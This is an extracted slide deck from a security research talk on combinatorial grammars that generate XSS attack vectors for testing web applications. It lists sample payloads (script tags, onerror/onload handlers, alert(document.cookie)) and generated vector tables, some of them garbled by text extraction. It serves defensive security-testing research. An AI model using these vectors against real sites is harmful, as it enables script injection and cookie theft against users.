combinatorial xss attack grammars - sba research
TRANSCRIPT
![Page 1: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/1.jpg)
Combinatorial XSS Attack Grammars
XSS Vectors for Everywhere
Bernhard [email protected]
SBA Research
April 10, 2015SBA Research, Vienna
![Page 2: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/2.jpg)
Outline
IntroductionXSSInput parameter modellingChallenges
Evolution of grammarsGlobal grammarsSubgrammars
Brief note about oracles
2/22
![Page 3: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/3.jpg)
Overview of Cross-Site-Scripting (XSS)
XSS vulnerabilities are caused by insufficient input sanitizing/parsing ofparameter values of web applications.
• XSS remains one of the top vulnerabilities in OWASP Top 10 WebApplication Security Risks:
I 2010: 2ndI 2013: 3rd
Threat:Execution of malicious JavaScript in the victim’s browser!
3/22
![Page 4: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/4.jpg)
Testing overview – bird’s eye view
Test suitegenerator
Test caseexecution
Test suite
Policy
SUT
Checkoutput
PASS FAIL
Model
4/22
![Page 5: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/5.jpg)
Cross-Site-Scripting (XSS)
Scope: We focus on reflected and stored XSS
Example: The response sent from a server contains parts of thesubmitted request-url reflected identically the body
Goal: Make injected JavaScript executable!
• High quality XSS vectors are of utmost importance to find/revealvulnerabilities!
• Various generation methods (fuzzing, manually crafted list, learningapproaches, CT)
5/22
![Page 6: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/6.jpg)
Increase in web-apps: injection possibilities
everywhere!
6/22
![Page 7: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/7.jpg)
Structure of an XSS Attack VectorValid URLs vs Attack Vectors
• Normal case: http://www.foo.com/error.php?msg=hello
• Attacker injects client-side script in parameter msg: http:
//www.foo.com/error.php?msg=<script>alert(1)</script>
Sample of XSS attack vectors
<src> onclick ’’"alert(\"hacked\")"</src>
<script>’ onclick alert(document.cookie)</script>
Input Parameter Model• Parameters ⇒ parts of the url
• Parameter value selection: Input parameter modelling via categories
Combinatorial form of an XSS attack vectorAV := (parameter1, parameter2, . . . , parameterk) 7/22
![Page 8: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/8.jpg)
Challenges
Model creation can be considered as multi-objective optimizationproblem
• Network latency
• Avoidance of DoSing
• Sizes of the arrays (CAN)
Aim:High quality, highly diverse attack vectors
8/22
![Page 9: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/9.jpg)
Resulting Test Vectors
Generation parameters:
• Class of array (MCA)I Algorithms (IPO-family)I ACTS (Courtesy of NIST)I THANK YOU VERY MUCH
• Strength t
• Constraint solver
• New/extend/base choice (corresponds to modelling)
• Priorization
Yields files with XSS attack vectors, one attack vector per line,corresponding to rows in arrays.
9/22
![Page 10: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/10.jpg)
Example
11 , 2 , 2 , 2 , 2 , 2 , 1 , 2 , 2 , 2 , 2 //−− onMouseOver ( </s c r i p t>22 , 3 , 3 , 3 , 3 , 3 , 1 , 3 , 3 , 3 , 3 <s c r i p t> //” ; onE r ro r ( ”) <</s c r i p t>33 , 1 , 4 , 1 , 1 , 1 , 1 , 1 , 4 , 1 , 4 <<s c r i p t >// ’; onLoad ( ’)</ s c r i p t>”>44 , 2 , 5 , 3 , 1 , 2 , 1 , 3 , 5 , 1 , 5 <s c r<s c r i p t>i p t> ”> onLoad ( ;\>55 , 3 , 6 , 1 , 2 , 3 , 1 , 1 , 6 , 2 , 6 <s c r i p t ’>onMouseOver ( ”> ”\>66 , 1 , 7 , 2 , 3 , 1 , 1 , 2 , 7 , 3 , 7 <img ’”> onEr ro r ( ’> ’\>77 , 2 , 8 , 1 , 3 , 2 , 1 , 1 , 8 , 3 , 8 <IMG ”’>onEr ro r ( < >88 , 3 , 9 , 2 , 1 , 3 , 1 , 2 , 9 , 1 , 9 <SCRIPT/XSS ”>> onLoad ( <<>>99 ,1 , 10 , 3 , 2 , 1 , 1 , 3 , 10 , 2 , 1 <’>> onMouseOver ( ; //1010 ,3 , 11 , 1 , 3 , 1 , 1 , 3 , 11 , 1 , 2 << \”; onE r ro r ( // </s c r i p t>1111 ,1 , 12 , 2 , 1 , 2 , 1 , 1 , 1 , 2 , 3 </TITLE> onLoad ( ) <</s c r i p t>1212 ,3 , 13 , 3 , 3 , 3 , 1 , 2 , 2 , 3 , 4 <INPUT TYPE=”IMAGE” / onEr ro r ( </s c r i p t>”>1313 ,1 , 14 , 1 , 2 , 1 , 1 , 2 , 3 , 1 , 5 <LINK REL=” s t y l e s h e e t ”\onMouseOver ( ”)\>1414 , 2 , 1 , 2 , 3 , 2 , 1 , 3 , 4 , 2 , 6 ’ ’><s c r i p t> ’ ; onE r ro r ( ’ ) ”\>1515 , 3 , 2 , 1 , 1 , 3 , 1 , 1 , 5 , 3 , 7 ’’>< s c r i p t> //−−onLoad ( ; ’\>161 , 1 , 3 , 3 , 1 , 1 , 2 , 2 , 6 , 1 , 8 //” ; onLoad(<1> ”>>172 , 2 , 4 , 1 , 2 , 2 , 2 , 3 , 7 , 2 , 9 <s c r i p t> // ’ ; onMouseOver ( <1> ’> >>183 , 3 , 5 , 2 , 3 , 3 , 2 , 2 , 8 , 3 , 1 <<s c r i p t> ”> onEr ro r ( <1><194 , 1 , 6 , 3 , 3 , 1 , 2 , 1 , 9 , 3 , 2 <s c r<s c r i p t>i p t>’> onEr ro r(<1><< </s c r i p t>205 , 2 , 7 , 1 , 1 , 2 , 2 , 2 , 10 , 1 , 3 <s c r i p t ’”>onLoad ( <1> ;//<</ s c r i p t>
10/22
![Page 11: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/11.jpg)
Definition pos vecs
1233 , 1 , 4 , 1 , 1 , 1 , 1 , 1 , 4 , 1 , 4 <<s c r i p t >// ’; onLoad ( ’)</ s c r i p t>”>4566 , 1 , 7 , 2 , 3 , 1 , 1 , 2 , 7 , 3 , 7 <img ’”> onEr ro r ( ’> ’\>7899 ,1 , 10 , 3 , 2 , 1 , 1 , 3 , 10 , 2 , 1 <’>> onMouseOver ( ; //101111 ,1 , 12 , 2 , 1 , 2 , 1 , 1 , 1 , 2 , 3 </TITLE> onLoad ( ) <</s c r i p t>12131414 , 2 , 1 , 2 , 3 , 2 , 1 , 3 , 4 , 2 , 6 ’ ’><s c r i p t> ’ ; onE r ro r ( ’ ) ”\>1515 , 3 , 2 , 1 , 1 , 3 , 1 , 1 , 5 , 3 , 7 ’’>< s c r i p t> //−−onLoad ( ; ’\>161 , 1 , 3 , 3 , 1 , 1 , 2 , 2 , 6 , 1 , 8 //” ; onLoad(<1> ”>>17181920
11/22
![Page 12: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/12.jpg)
Evalution of grammars – criteria
• Test suite size
•
ER :=# pos vecs
# test suite(1)
• Simple t-way combination coverage of passing tests (CCM tool)
• Correlation of parameter values and specific sanitizing functions forinput checking
• Data mining / machine learning
Recent resultsSee our contribution to IWCT 2015
12/22
![Page 13: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/13.jpg)
Milestones in the Grammar Development
Global grammars• Global = generic attack grammars for XSS
• Publications:I Proof of Concept [AST 2014]I Global grammar G [JAMAICA 2014]I Global grammar constrained G c [IWCT 2015]
Subgrammars [UNPUBLISHED]
• Optimized grammars to attack specific contexts in an HTML page
• Multiple refinement iterations
13/22
![Page 14: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/14.jpg)
AST 2014
J. Bozic, D. E. Simos, F. Wotawa
• Inception of attack pattern +CT for Security Testing
• Important differences:generation, structure andexecution of test cases
• Algorithm: IPOG
• Sizes of attack suites:I t = 2: 114I t = 3: 1031I t = 4: 8332
Grammar:MCA (t, 12, (1, 1, 1, 1, 3, 3, 6, 9, 9, 10, 10, 10))
FOBRACKET(1) ::= <
TAG(10) ::= img | frame | src | script | body | HEAD | ...
FCBRACKET(1) ::= >
QUOTE1(3) ::= | | null
SPACE(9) ::= \n | \t | \r | \ r\n | \ a | \b | \ c | ...
EVENT(10) ::= onclick | onmouseover | onerror ...
SPACE2(9) ::= \n | \t | \r | \ r\n | \ a | \b | \ c | ...
QUOTE2(3) ::= | | null
PAYLOAD(6) ::= alert(1) | alert(0) | ...
LOBRACKET(1) ::= </
CLOSINGTAG(10) ::= img | frame | src | script | body | ...
LCBRACKET(1) ::= >
Constrainttag = closingtag
14/22
![Page 15: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/15.jpg)
Jamaica 2014
B. Garn, I. Kapsalis, D. E. Simos, S. Winkler
• Configuration:MCA (t, 11, (3, 3, 3, 3, 3, 3, 9, 11, 14, 15, 23))
I 11 parametersI whitespace modelingI no constraints
• Algorithm: IPOG
• Comparison of tools(ZAP, Burp)
• Sizes of attack suites:I t = 2: 345I t = 3: 4875I t = 4: 54706
Grammar GJSO(15)::= <script> | <img | ...
WS1(3)::= tab | space | ...
INT(14)::= "’; | ">> | ...
WS2(3)::= tab | space | ...
EVH(3)::= onLoad( | onError( | ...
WS3(3)::= tab | space | ...
PAY(23)::= alert(’XSS’) | ONLOAD=alert(’XSS’) | ...
WS4(3)::= tab | space | ...
PAS(11)::= ’) | ’> | ...
WS5(3)::= tab | space | ...
JSE(9)::= </script> | > | ...
15/22
![Page 16: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/16.jpg)
IWCT 2015
J. Bozic, B. Garn, D. E. Simos, F. Wotawa
• Configuration:MCA (t, 11, (3, 3, 3, 3, 3, 3, 9, 11, 14, 15, 23))
I 11 parametersI whitespace modelingI CONSTRAINTS
• Algorithm: IPOG, IPOG-F
• Comparison of algorithms
Some constraints of G c(JSO=5) => (JSE=5 || JSE=6 || JSE=7 || JSE=8 || JSE=9)
(EVH=1) => (PAY=12 || PAY=14 || PAY=17 || PAY=18 || PAY=19)
(WS1=WS2 && WS2=WS3 && WS3=WS4 && WS4=WS5)
Table: Different sizes of test suites
Str. G G c
IPOG IPOG-F IPOG IPOG-F
2 345 345 250 2523 4875 4830 1794 20124 53706 53130 8761 9760
16/22
![Page 17: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/17.jpg)
Subgrammars [UNPUBLISHED]
• Can be thought of as “specific attacks”
• From 10 to 4 to 3 subgrammars (including new constraints each):I inside elementI inside attributeI inside JavaScript
• Parameter values specific to context of subgrammar
• Evalutation pending, so far highly effective
17/22
![Page 18: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/18.jpg)
10 Subgrammars
@element
sg1MCA (t, 8, (2, 6, 5, 3, 2, 5, 6, 3))
sg2MCA(t, 12, (2, 6, 5, 3, 2, 1, 2,
5, 3, 6, 3, 3))
sg3MCA(t, 15, (2, 5, 3, 2, 2, 2, 5, 3, 1,
1, 2, 6, 1, 3, 3))
sg10MCA (t, 9, (2, 2, 2, 5, 4, 1, 6, 4, 3))
@attribute
sg4MCA (t, 7, (4, 3, 3, 2, 5, 6, 3))
sg5MCA (t, 8, (4, 3, 2, 5, 3, 6, 3, 3))
@JavaScript
sg6MCA (t, 3, (1, 2, 6))
sg7MCA (t, 4, (4, 2, 5, 6))
sg8MCA (t, 5, (4, 3, 1, 6, 1))
sg9MCA (t, 3, (2, 6, 2))
18/22
![Page 19: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/19.jpg)
3 Subgrammars
@element
SG01 MCA (t, 5, (3, 3, 7, 3, 7))
delimiter01
closing-angle-bracket
opening-tag
payload
closing tag
Constr (excertp)
opening-tag=2 => closing-tag=2
@attribute
SG02 MCA (t, 4, (3, 6, 3, 6))
delim01
attribute
payload
delim02
Const (excerpt)
(delim01=1)=>(delim02=1||delim02=3)
@JavaScript
SG03 MCA (t, 3, (3, 3, 3))
delim03
payload
delim04
Constr (excerpt)
(delim03=3)=>(delim04=3)
19/22
![Page 20: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/20.jpg)
Oracle Consideration
• Reflection oracleI via string matchingI false positives, false negativesI tools seem not to agree
• Browser oracleI zero false positives (!)
Change of oracle might require change of some parameters/parametervalues
20/22
![Page 21: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/21.jpg)
Change of payload
• Reflection oracleI possible parameter values: alert(’1’), alert(document.coockie)I any malicious code possible
• Browser oracleI at this location we call homeI coordination with logging infrastructure
Testing with different oracles can require re-generation of attack suites
21/22
![Page 22: Combinatorial XSS Attack Grammars - SBA Research](https://reader031.vdocument.in/reader031/viewer/2022020702/61fa450a9a534c60ea4a9851/html5/thumbnails/22.jpg)
Conclusion
• Everything shown is completely scripted (i.e. automated)!
Thank you very much for your attention!
Questions?
22/22